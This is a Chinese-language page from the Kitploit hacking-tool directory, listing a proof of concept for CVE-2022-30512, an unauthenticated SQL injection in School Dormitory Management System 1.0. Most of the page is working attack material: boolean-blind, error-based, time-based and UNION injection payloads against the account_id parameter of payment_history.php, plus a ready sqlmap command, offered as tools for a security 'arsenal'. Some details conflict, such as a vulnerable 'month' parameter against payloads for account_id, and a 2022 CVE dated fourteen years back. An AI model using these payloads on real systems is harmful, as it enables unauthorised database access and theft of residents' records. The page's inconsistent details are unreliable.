Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2022-30512 — 学校宿舍管理系统 1.0 - 未经身份验证的SQL注入 | Kitploit
工具/GitHubGitHub/bigzooooz/cve-2022-30512
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试
GitHubbigzooooz/cve-2022-30512

CVE-2022-30512

学校宿舍管理系统 1.0 - 未经身份验证的SQL注入

查看仓库
14年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2022-30512

学校宿舍管理系统 1.0 - 未经身份验证的 SQL 注入

漏洞标题:学校宿舍管理系统 1.0 - 未经身份验证的 SQL 注入

日期:2022-05-25

CVE:CVE-2022-30512

漏洞作者:Abdulaziz Saad (@b4zb0z)

厂商主页:https://www.sourcecodester.com/

软件链接:https://www.sourcecodester.com/php/15319/school-dormitory-management-system-phpoop-free-source-code.html

版本:1.0

测试环境:LAMP, Ubuntu


[#] 漏洞位置: $_GET['month'] 位于 /dms/admin/accounts/payment_history.php:31

root@kitploit:~
参数:account_id (GET)
root@kitploit:~
类型:基于布尔的盲注
标题:AND 基于布尔的盲注 - WHERE 或 HAVING 子句
载荷:account_id=2' AND 6703=6703 AND 'jmUS'='jmUS
root@kitploit:~
类型:基于错误的注入
root@kitploit:~
标题:MySQL >= 5.0 基于错误注入 - WHERE、HAVING、ORDER BY 或 GROUP BY 子句 (FLOOR)
载荷:account_id=2' AND (SELECT 7343 FROM(SELECT COUNT(*),CONCAT(0x71716b7671,(SELECT (ELT(7343=7343,1))),0x7170626a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'htiO'='htiO
root@kitploit:~
类型:基于时间的盲注
root@kitploit:~
标题:MySQL >= 5.0.12 基于时间的盲注 (查询 SLEEP)
载荷:account_id=2' AND (SELECT 2865 FROM (SELECT(SLEEP(5)))hWAb) AND 'pbGX'='pbGX
root@kitploit:~
类型:UNION 查询
root@kitploit:~
标题:通用 UNION 查询 (NULL) - 7 列
载荷:account_id=2' UNION ALL SELECT CONCAT(0x71716b7671,0x6458467273575152444c465a7a5276684f74756c7a754b6d506a6c437a5a516479574d5844694b78,0x7170626a71),NULL,NULL,NULL,NULL,NULL,NULL-- -

[#] 使用 SQLMAP 进行利用: sqlmap -u "http://localhost/dms/admin/accounts/payment_history.php?account_id=2" --dbms=mysql

下载工具